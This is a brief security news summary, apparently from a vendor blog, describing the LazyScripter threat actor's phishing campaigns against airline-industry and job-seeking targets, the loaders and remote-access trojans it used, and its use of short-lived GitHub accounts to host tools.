Researchers have disclosed malicious activities belonging to a previously unidentified actor. Dubbed as LazyScripter, this threat actor has been active since 2018.
LazyScripter Discovered –
Late last year, a few malicious documents loaded with objects that were created to target job seekers were discovered by researchers. These loaded objects (VBScript or batch files) were used by the LazyScripter APT group.
- The International Air Transport Association (IATA) and airlines that are using the BSPLink software were targeted by this threat group.
- It also victimized users who were looking to immigrate to Canada in search of jobs.
- The attackers have used KOCTOPUS loaders to deploy Octopus and Koadic, taking into account all of their recent phishing lures.
- Additionally, RATs, such as LuminosityLink, Quasar, RMS, njRat, and Remcos, which are used by multiple hacking groups were being dropped by the threat actor.
A change in tools –
- Mostly, spam emails laden with archive or document files as an initial infection vector were used by this threat actor in the past. A variant of either KOCTOPUS or Empoder, was included in both the zip and document files.
- Multiple file types have been used by the group over a period of time, as its initial phishing lures, and changed the main toolset from PowerShell Empire to double RAT (Octopus and Koadic).
Using GitHub for Hosting Toolsets –
As a tactic previously used by an APT group linked with Iran, LazyScripter hosted its toolsets on GitHub.
- Two GitHub accounts were created by the group in January, LIZySARA, and Axella49, and deleted in the same month.
- Another Github account was created by them later on hosting payloads in a spam campaign. This account has been deleted from GitHub.
The behavior of this malicious group suggests that they are continuously making efforts to polish their tools and attack tactics. Additionally, the use of tools that are freely available and the malware displays how smartly this group is making use of commercially available tools, and the combination of all these strategies makes this group a lethal threat.
To read more, please check eScan Blog
